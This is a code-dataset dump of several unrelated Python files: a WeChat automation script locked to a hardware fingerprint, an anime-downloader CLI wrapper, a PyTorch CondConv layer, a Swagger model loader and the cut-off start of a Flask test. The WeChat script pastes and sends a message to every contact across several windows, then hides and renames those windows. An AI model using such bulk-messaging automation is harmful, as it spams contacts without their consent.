(mac_2 + cpu_id_2)\n return ency_string\n\n\ndef get_now_time():\n now_time = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime(time.time()))\n return now_time\n\n\ndef get_screen_range():\n SCREEN_SHOTS_LEFT_DIF_X = 510\n SCREEN_SHOTS_LEFT_DIF_Y = 110\n SCREEN_SHOTS_RIGHT_DIF_X = 630\n SCREEN_SHOTS_RIGHT_DIF_Y = 220\n SCREEN_SHOTS_LEFT_REAL = dif_to_real(SCREEN_SHOTS_LEFT_DIF_X, SCREEN_SHOTS_LEFT_DIF_Y)\n SCREEN_SHOTS_RIGHT_REAL = dif_to_real(SCREEN_SHOTS_RIGHT_DIF_X, SCREEN_SHOTS_RIGHT_DIF_Y)\n SCREEN_RANGE = (SCREEN_SHOTS_LEFT_REAL[0], SCREEN_SHOTS_LEFT_REAL[1], SCREEN_SHOTS_RIGHT_REAL[0], SCREEN_SHOTS_RIGHT_REAL[1])\n return SCREEN_RANGE\n\ndef get_screen_shots(SCREEN_RANGE, NEW_IMAGE_NAME):\n new_image = ImageGrab.grab(SCREEN_RANGE)\n new_image.save(NEW_IMAGE_NAME)\n\n\ndef remark_new_to_old(OLD_IMAGE_NAME, NEW_IMAGE_NAME):\n if os.path.isfile(NEW_IMAGE_NAME) == True:\n if os.path.isfile(OLD_IMAGE_NAME) == True:\n os.remove(OLD_IMAGE_NAME)\n else:\n print(\"OLD_IMAGE do not exist\")\n os.rename(NEW_IMAGE_NAME, OLD_IMAGE_NAME)\n else:\n print(\"NEW_IMAGE do not exist\")\n\n\ndef del_images_last_time(OLD_IMAGE_NAME, NEW_IMAGE_NAME):\n if os.path.isfile(NEW_IMAGE_NAME) == True:\n os.remove(NEW_IMAGE_NAME)\n print(\"NEW_IMAGE deleted\")\n else:\n print(\"NEW_IMAGE do not exist\")\n if os.path.isfile(OLD_IMAGE_NAME) == True:\n os.remove(OLD_IMAGE_NAME)\n print(\"OLD_IMAGE deleted\")\n else:\n print(\"OLD_IMAGE do not exist\")\n\n\ndef dif_image(OLD_IMAGE_NAME, NEW_IMAGE_NAME):\n if os.path.isfile(NEW_IMAGE_NAME) == True:\n if os.path.isfile(OLD_IMAGE_NAME) == True:\n new_image = Image.open(NEW_IMAGE_NAME)\n old_image = Image.open(OLD_IMAGE_NAME)\n h_new_image = new_image.histogram()\n h_old_image = old_image.histogram()\n result = math.sqrt(reduce(operator.add, list(map(lambda a, b: (a-b)**2, h_new_image, h_old_image)))/len(h_new_image))\n # print(result)\n return result\n else:\n return 1\n else:\n return 1\n\n\ndef get_key_state(key):\n key_state = win32api.GetAsyncKeyState(key)\n if key_state == 0:\n return False\n elif key_state == 1:\n return False\n elif key_state == -32767:\n return True\n elif key_state == -32768:\n return True\n\n\ndef get_F1_state():\n F1_state = get_key_state(win32con.VK_F1)\n return F1_state\n\n\ndef get_F12_state():\n F12_state = get_key_state(win32con.VK_F12)\n return F12_state\n\n\ndef get_is_pause():\n is_pause = False\n F12_state = get_F12_state()\n if F12_state == True:\n is_pause = True\n else:\n is_pause = False\n return is_pause\n\n\ndef is_pause():\n is_pause = get_is_pause()\n while (is_pause):\n F1_state = get_F1_state()\n if F1_state == True:\n is_pause = False\n else:\n is_pause = True\n\ndef test():\n filename = \"D:/handles\" \n # class_name = \"CabinetWClass\"\n # title = \"文件资源管理器\"\n class_name = \"WeChatMainWndForPC\"\n title = \"微信\"\n pos_sended = [300, 100, 500, 500]\n origin = get_origin_point()\n SCREEN_RANGE = get_screen_range()\n hwnds_array = get_all_handles(filename, class_name, title)\n init_to_start(hwnds_array, origin)\n print(len(hwnds_array), hwnds_array)\n for hwnd in hwnds_array:\n move_window(hwnd, origin)\n set_active_window(hwnd)\n del_images_last_time(OLD_IMAGE_NAME, NEW_IMAGE_NAME)\n i = 0\n while dif_image(OLD_IMAGE_NAME, NEW_IMAGE_NAME):\n click_contacts()\n keybd_down()\n delay(200)\n remark_new_to_old(OLD_IMAGE_NAME, NEW_IMAGE_NAME)\n get_screen_shots(SCREEN_RANGE, NEW_IMAGE_NAME)\n click_send_icon()\n delay(300)\n paste_message()\n send_message()\n i = i + 1\n print(i)\n is_pause()\n move_window(hwnd, pos_sended)\n hide_window(hwnd)\n change_wnd_text(hwnd, \"weichat\")\n print(\"finish:\", hwnd)\n print(\"Finish All\")\n for hwnd in hwnds_array:\n change_wnd_text(hwnd, title)\n\n\n\nnow_time = get_now_time()\nFILE_LOG = \"log.txt\"\nstring = ency()\nNEW_IMAGE_NAME = \"image_new.png\"\nOLD_IMAGE_NAME = \"image_old.png\"\n\nprint(string, INPUT_YOURS_SHIT)\nif string == INPUT_YOURS_SHIT:\n test()\n content = now_time + \": Succeed\", INPUT_YOURS_SHIT\n write_file(FILE_LOG, 'w', content)\n print(content)\nelse:\n content = now_time + \": fail\", INPUT_YOURS_SHIT\n write_file(FILE_LOG, 'w', content)\n print(content)\n pass\n\n\n\n\n\n\n\n# SCREEN_SHOTS_LEFT_DIF = [510, 110]\n# SCREEN_SHOTS_RIGHT_DIF = [630, 220]\n\n# \"WeChatMainWndForPC\", \"微信\"", "sub_path": "wc/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 9808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "win32gui.FindWindow", "line_number": 38, "usage_type": "call"}, {"api_name": "win32gui.GetWindowText", "line_number": 47, "usage_type": "call"}, {"api_name": "win32gui.SetWindowText", "line_number": 58, "usage_type": "call"}, {"api_name": "win32gui.ShowWindow", "line_number": 88, "usage_type": "call"}, {"api_name": "win32con.SW_SHOWMINIMIZED", "line_number": 88, "usage_type": "attribute"}, {"api_name": "win32gui.ShowWindow", "line_number": 95, "usage_type": "call"}, {"api_name": "win32con.SW_SHOWNORMAL", "line_number": 95, "usage_type": "attribute"}, {"api_name": "win32gui.SetActiveWindow", "line_number": 101, "usage_type": "call"}, {"api_name": "win32gui.MoveWindow", "line_number": 128, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 134, "usage_type": "call"}, {"api_name": "win32api.SetCursorPos", "line_number": 148, "usage_type": "call"}, {"api_name": "win32api.mouse_event", "line_number": 149, "usage_type": "call"}, {"api_name": "win32con.MOUSEEVENTF_LEFTDOWN", "line_number": 149, "usage_type": "attribute"}, {"api_name": "win32api.mouse_event", "line_number": 150, "usage_type": "call"}, {"api_name": "win32con.MOUSEEVENTF_LEFTUP", "line_number": 150, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 169, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 170, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 171, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 171, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 172, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 172, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 177, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 178, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 179, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 179, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 180, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 180, "usage_type": "attribute"}, {"api_name": "win32api.keybd_event", "line_number": 184, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 185, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 185, "usage_type": "attribute"}, {"api_name": "uuid.getnode", "line_number": 189, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 190, "usage_type": "call"}, {"api_name": "wmi.WMI", "line_number": 195, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 204, "usage_type": "call"}, {"api_name": "base64.encodestring", "line_number": 205, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 211, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 211, "usage_type": "call"}, {"api_name": "time.time", "line_number": 211, "usage_type": "call"}, {"api_name": "PIL.ImageGrab.grab", "line_number": 226, "usage_type": "call"}, {"api_name": "PIL.ImageGrab", "line_number": 226, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 232, "usage_type": "call"}, {"api_name": "os.path", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 233, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 243, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 247, "usage_type": "call"}, {"api_name": "os.path", "line_number": 247, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 256, "usage_type": "call"}, {"api_name": "os.path", "line_number": 256, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 257, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 257, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 258, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 258, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 261, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 261, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 261, "usage_type": "attribute"}, {"api_name": "win32api.GetAsyncKeyState", "line_number": 271, "usage_type": "call"}, {"api_name": "win32con.VK_F1", "line_number": 283, "usage_type": "attribute"}, {"api_name": "win32con.VK_F12", "line_number": 288, "usage_type": "attribute"}]} +{"seq_id": "215582288", "text": "import json\nimport sys \nimport subprocess\nimport importlib.util\n\ntry:\n from anime_downloader import get_anime_class, ALL_ANIME_SITES\nexcept ImportError:\n pass\n\ndef create_json(key, message):\n data = {}\n data[key] = message\n return json.dumps(data)\n\ndef install_dependency():\n python = sys.executable\n subprocess.check_call([python, \"-m\", \"pip\", \"install\", \"anime_downloader\"], stdout = subprocess.DEVNULL)\n\ndef check_dependency():\n dependency = importlib.util.find_spec(\"anime_downloader\")\n return dependency is not None\n\ndef get_supported_sites():\n return json.dumps(ALL_ANIME_SITES)\n\ndef search_anime(query, site):\n anime = get_anime_class(site)\n return json.dumps([dict(title=a.title, url=a.url, poster=a.poster) for a in anime.search(query)])\n\ndef get_anime(url, site):\n anime = get_anime_class(site)\n\n def dictify_anime(a):\n return dict(\n title = a.title,\n url = a.url,\n sitename = a.sitename,\n episode_count = len(a)\n )\n\n return json.dumps(dictify_anime(anime(url)))\n\ndef get_anime_episode(url, site, episode):\n anime = get_anime_class(site)\n\n return json.dumps(dictify_episode(anime(url), episode))\n\ndef get_anime_episode_2(query, site, episode):\n provider = get_anime_class(site)\n result = provider.search(query)[0]\n anime = provider(result.url)\n\n return json.dumps(dictify_episode(anime, episode))\n\ndef dictify_episode(a, episode):\n e = a[episode]\n return dict(\n title = a.title,\n number = e.ep_no,\n stream_url = e.source().stream_url\n )\n\nif len(sys.argv) < 2:\n print(create_json(\"error\", \"invalid syntax\"), flush = True)\n quit()\n\nif sys.argv[1] == \"--supported\":\n print(get_supported_sites())\nelif sys.argv[1] == \"--search\":\n print(search_anime(sys.argv[2], sys.argv[3]))\nelif sys.argv[1] == \"--get-anime\":\n print(get_anime(sys.argv[2], sys.argv[3]))\nelif sys.argv[1] == \"--get-episode\":\n print(get_anime_episode(sys.argv[2], sys.argv[3], int(sys.argv[4]) - 1))\nelif sys.argv[1] == \"--get-episode-smart\":\n print(get_anime_episode_2(sys.argv[2], sys.argv[3], int(sys.argv[4]) - 1))\nelif sys.argv[1] == \"--install-deps\":\n install_dependency()\n print(create_json(\"status\", \"installed dependencies\"))\nelif sys.argv[1] == \"--check-deps\":\n print(create_json(\"dependency\", check_dependency()))\n\nsys.stdout.flush()\n", "sub_path": "scripts/anime.py", "file_name": "anime.py", "file_ext": "py", "file_size_in_byte": 2399, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 17, "usage_type": "attribute"}, {"api_name": "subprocess.check_call", "line_number": 18, "usage_type": "call"}, {"api_name": "subprocess.DEVNULL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "importlib.util.util.find_spec", "line_number": 21, "usage_type": "call"}, {"api_name": "importlib.util.util", "line_number": 21, "usage_type": "attribute"}, {"api_name": "importlib.util", "line_number": 21, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}, {"api_name": "anime_downloader.ALL_ANIME_SITES", "line_number": 25, "usage_type": "argument"}, {"api_name": "anime_downloader.get_anime_class", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 29, "usage_type": "call"}, {"api_name": "anime_downloader.get_anime_class", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "anime_downloader.get_anime_class", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "anime_downloader.get_anime_class", "line_number": 50, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 72, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 74, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 77, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 78, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 81, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 84, "usage_type": "attribute"}]} +{"seq_id": "125600041", "text": "\"\"\"\n5-Dez-21\nhttps://github.com/xmu-xiaoma666/External-Attention-pytorch/blob/master/model/conv/CondConv.py\n\"\"\"\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass Attention(nn.Module):\n def __init__(self, in_planes, K, init_weight=True):\n super().__init__()\n self.avgpool = nn.AdaptiveAvgPool2d(1)\n self.net = nn.Conv2d(in_planes, K, kernel_size=1, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n if init_weight:\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode=\"fan_out\", nonlinearity=\"relu\")\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n if isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def forward(self, x):\n att = self.avgpool(x) # bs,dim,1,1\n att = self.net(att).view(x.shape[0], -1) # bs,K\n return self.sigmoid(att)\n\n\nclass CondConv(nn.Module):\n def __init__(\n self,\n in_planes,\n out_planes,\n kernel_size,\n stride,\n padding=0,\n dilation=1,\n grounps=1,\n bias=True,\n K=4,\n init_weight=True,\n ):\n super().__init__()\n self.in_planes = in_planes\n self.out_planes = out_planes\n self.kernel_size = kernel_size\n self.stride = stride\n self.padding = padding\n self.dilation = dilation\n self.groups = grounps\n self.bias = bias\n self.K = K\n self.init_weight = init_weight\n self.attention = Attention(in_planes=in_planes, K=K, init_weight=init_weight)\n\n self.weight = nn.Parameter(\n torch.randn(K, out_planes, in_planes // grounps, kernel_size, kernel_size),\n requires_grad=True,\n )\n if bias:\n self.bias = nn.Parameter(torch.randn(K, out_planes), requires_grad=True)\n else:\n self.bias = None\n\n if self.init_weight:\n self._initialize_weights()\n\n # TODO 初始化\n\n def _initialize_weights(self):\n for i in range(self.K):\n nn.init.kaiming_uniform_(self.weight[i])\n\n def forward(self, x):\n bs, in_planels, h, w = x.shape\n softmax_att = self.attention(x) # bs,K\n x = x.view(1, -1, h, w)\n weight = self.weight.view(self.K, -1) # K,-1\n aggregate_weight = torch.mm(softmax_att, weight).view(\n bs * self.out_planes,\n self.in_planes // self.groups,\n self.kernel_size,\n self.kernel_size,\n ) # bs*out_p,in_p,k,k\n\n if self.bias is not None:\n bias = self.bias.view(self.K, -1) # K,out_p\n aggregate_bias = torch.mm(softmax_att, bias).view(-1) # bs,out_p\n output = F.conv2d(\n x,\n weight=aggregate_weight,\n bias=aggregate_bias,\n stride=self.stride,\n padding=self.padding,\n groups=self.groups * bs,\n dilation=self.dilation,\n )\n else:\n output = F.conv2d(\n x,\n weight=aggregate_weight,\n bias=None,\n stride=self.stride,\n padding=self.padding,\n groups=self.groups * bs,\n dilation=self.dilation,\n )\n\n output = output.view(bs, self.out_planes, h, w)\n return output\n\n\nif __name__ == \"__main__\":\n input = torch.randn(2, 32, 64, 64)\n m = CondConv(\n in_planes=32, out_planes=64, kernel_size=3, stride=1, padding=1, bias=False\n )\n out = m(input)\n print(out.shape)\n", "sub_path": "code/arch/conv/CondConv.py", "file_name": "CondConv.py", "file_ext": "py", "file_size_in_byte": 3809, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_uniform_", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.mm", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 96, "usage_type": "name"}, {"api_name": "torch.nn.functional.conv2d", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "615166863", "text": "#\n# Copyright (c) 2013, Digium, Inc.\n#\n\n\"\"\"Code for handling the base Swagger API model.\n\"\"\"\n\nimport json\nimport os\nimport urllib\nimport urlparse\nimport requests\n\nfrom swaggerpy.jsonify import jsonify\nfrom swaggerpy.processors import SwaggerProcessor, SwaggerError\n\nSWAGGER_VERSIONS = [\"1.1\", \"1.2\"]\n\nSWAGGER_PRIMITIVES = [\n 'void',\n 'string',\n 'boolean',\n 'number',\n 'int',\n 'long',\n 'double',\n 'float',\n 'Date',\n]\n\n\ndef compare_versions(lhs, rhs):\n \"\"\"Performs a lexicographical comparison between two version numbers.\n\n This properly handles simple major.minor.whatever.sure.why.not version\n numbers, but fails miserably if there's any letters in there.\n\n For reference:\n 1.0 == 1.0\n 1.0 < 1.0.1\n 1.2 < 1.10\n\n :param lhs: Left hand side of the comparison\n :param rhs: Right hand side of the comparison\n :return: < 0 if lhs < rhs\n :return: == 0 if lhs == rhs\n :return: > 0 if lhs > rhs\n \"\"\"\n lhs = [int(v) for v in lhs.split('.')]\n rhs = [int(v) for v in rhs.split('.')]\n return cmp(lhs, rhs)\n\n\nclass ValidationProcessor(SwaggerProcessor):\n \"\"\"A processor that validates the Swagger model.\n \"\"\"\n def process_resource_listing(self, resources, context):\n required_fields = ['basePath', 'apis', 'swaggerVersion']\n validate_required_fields(resources, required_fields, context)\n\n if not resources.swaggerVersion in SWAGGER_VERSIONS:\n raise SwaggerError(\n \"Unsupported Swagger version %s\" % resources.swaggerVersion,\n context)\n\n def process_resource_listing_api(self, resources, listing_api, context):\n validate_required_fields(listing_api, ['path', 'description'], context)\n\n if not listing_api.path.startswith(\"/\"):\n raise SwaggerError(\"Path must start with /\", context)\n\n def process_api_declaration(self, resources, resource, context):\n required_fields = [\n 'swaggerVersion', 'basePath', 'resourcePath', 'apis',\n 'models'\n ]\n validate_required_fields(resource, required_fields, context)\n # Check model name and id consistency\n for (model_name, model) in resource.models:\n if model_name != model.id:\n raise SwaggerError(\"Model id doesn't match name\", context)\n # Convert models dict to list\n\n def process_resource_api(self, resources, resource, api, context):\n required_fields = ['path', 'operations']\n validate_required_fields(api, required_fields, context)\n\n def process_operation(self, resources, resource, api, operation, context):\n required_fields = ['httpMethod', 'nickname']\n validate_required_fields(operation, required_fields, context)\n\n def process_parameter(self, resources, resource, api, operation, parameter,\n context):\n required_fields = ['name', 'paramType']\n validate_required_fields(parameter, required_fields, context)\n if parameter.paramType == 'path':\n # special handling for path parameters\n parameter.required = True\n parameter.dataType = 'string'\n else:\n # dataType is required for non-path parameters\n validate_required_fields(parameter, ['dataType'], context)\n if 'allowedValues' in parameter:\n raise SwaggerError(\n \"Field 'allowedValues' invalid; use 'allowableValues'\",\n context)\n\n def process_error_response(self, resources, resource, api, operation,\n error_response, context):\n required_fields = ['code', 'reason']\n validate_required_fields(error_response, required_fields, context)\n\n def process_model(self, resources, resource, model, context):\n required_fields = ['id', 'properties']\n validate_required_fields(model, required_fields, context)\n # Move property field name into the object\n for (prop_name, prop) in model.properties:\n prop.name = prop_name\n\n def process_property(self, resources, resource, model, prop,\n context):\n required_fields = ['type']\n validate_required_fields(prop, required_fields, context)\n\n\ndef json_load_url(session, url):\n \"\"\"Download and parse JSON from a URL, wrapping in a Jsonify.\n\n :param url: URL for JSON to parse\n :return: Parse JSON dict\n \"\"\"\n scheme = urlparse.urlparse(url).scheme\n if scheme == 'file':\n # requests can't handle file: URL's\n fp = urllib.urlopen(url)\n try:\n return json.load(fp)\n finally:\n fp.close()\n else:\n resp = session.get(url)\n resp.raise_for_status()\n return resp.json()\n\n\nclass Loader(object):\n def __init__(self, session, processors=None):\n self.session = session\n if processors is None:\n processors = []\n # always go through the validation processor first\n self.processors = [ValidationProcessor()]\n self.processors.extend(processors)\n\n def load_resource_listing(self, resources_url, base_url=None):\n \"\"\"Load a resource listing.\n\n :param resources_url: File name for resources.json\n :param base_url: Optional URL to be the base URL for finding API\n declarations. If not specified, 'basePath' from the\n resource listing is used.\n \"\"\"\n\n # Load the resource listing\n resource_listing_dict = json_load_url(self.session, resources_url)\n\n # Some extra data only known about at load time\n resource_listing_dict['url'] = resources_url\n if not base_url:\n base_url = resource_listing_dict.get('basePath')\n\n # Load the API declarations\n for api in resource_listing_dict.get('apis'):\n self.load_api_declaration(base_url, api)\n\n # Now that the raw object model has been loaded, apply the processors\n resource_listing_json = self.process_resource_listing(\n resource_listing_dict)\n\n return resource_listing_json\n\n def load_api_declaration(self, base_url, api_dict):\n path = api_dict.get('path').replace('{format}', 'json')\n api_dict['url'] = urlparse.urljoin(base_url + '/', path.strip('/'))\n api_dict['api_declaration'] = json_load_url(\n self.session, api_dict['url'])\n\n def process_resource_listing(self, resources):\n jsonified = jsonify(resources)\n for processor in self.processors:\n processor.apply(jsonified)\n return jsonified\n\n\ndef validate_required_fields(json, required_fields, context):\n \"\"\"Checks a JSON object for a set of required fields.\n\n If any required field is missing, a SwaggerError is raised.\n\n :type json: Jsonified\n :param json: JSON object to check.\n :param required_fields: List of required fields.\n :param context: Current context in the API.\n \"\"\"\n missing_fields = [f for f in required_fields\n if not f in json.get_field_names()]\n\n if missing_fields:\n raise SwaggerError(\n \"Missing fields: %s\" % ', '.join(missing_fields), context)\n\n\ndef load_file(resource_listing_file, session=None, processors=None):\n \"\"\"Loads a resource listing file, applying the given processors.\n\n :param resource_listing_file: File name for a resource listing.\n :param processors: List of SwaggerProcessors to apply to the resulting\n resource.\n :return: Processed object model from\n :raise: IOError: On error reading api-docs.\n \"\"\"\n file_path = os.path.abspath(resource_listing_file)\n url = urlparse.urljoin('file:', urllib.pathname2url(file_path))\n # When loading from files, everything is relative to the resource listing\n dir_path = os.path.dirname(file_path)\n base_url = urlparse.urljoin('file:', urllib.pathname2url(dir_path))\n return load_url(url, session=session, processors=processors,\n base_url=base_url)\n\n\ndef load_url(resource_listing_url, session=None, processors=None,\n base_url=None):\n \"\"\"Loads a resource listing, applying the given processors.\n\n :param resource_listing_url: URL for a resource listing.\n :param processors: List of SwaggerProcessors to apply to the resulting\n resource.\n :param base_url: Optional URL to be the base URL for finding API\n declarations. If not specified, 'basePath' from the\n resource listing is used.\n :return: Processed object model from\n :raise: IOError, URLError: On error reading api-docs.\n \"\"\"\n if session is None:\n session = requests.Session()\n\n loader = Loader(session=session, processors=processors)\n return loader.load_resource_listing(\n resource_listing_url, base_url=base_url)\n\n\ndef load_json(resource_listing, session=None, processors=None):\n if session is None:\n session = requests.Session()\n\n loader = Loader(session=session, processors=processors)\n return loader.process_resource_listing(resource_listing)\n", "sub_path": "swaggerpy/swagger_model.py", "file_name": "swagger_model.py", "file_ext": "py", "file_size_in_byte": 9150, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "swaggerpy.processors.SwaggerProcessor", "line_number": 54, "usage_type": "name"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 62, "usage_type": "call"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 70, "usage_type": "call"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 81, "usage_type": "call"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 104, "usage_type": "call"}, {"api_name": "urlparse.urlparse", "line_number": 132, "usage_type": "call"}, {"api_name": "urllib.urlopen", "line_number": 135, "usage_type": "call"}, {"api_name": "json.load", "line_number": 137, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 184, "usage_type": "call"}, {"api_name": "swaggerpy.jsonify.jsonify", "line_number": 189, "usage_type": "call"}, {"api_name": "json.get_field_names", "line_number": 206, "usage_type": "call"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "urlparse.urljoin", "line_number": 223, "usage_type": "call"}, {"api_name": "urllib.pathname2url", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "urlparse.urljoin", "line_number": 226, "usage_type": "call"}, {"api_name": "urllib.pathname2url", "line_number": 226, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 245, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 254, "usage_type": "call"}]} +{"seq_id": "127810493", "text": "import unittest\nfrom flask import Flask, jsonify\nimport flask\nfrom flask_errors import init_app, HTTPError\n\n\nclass HTTPErrorTestCase(unittest.TestCase):\n def setUp(self):\n self.app = Flask(__name__)\n\n def test_get_message(self):\n message = 'foo bar'\n identifier = ''\n status_code = 400\n\n @self.app.route('/')\n def index():\n raise 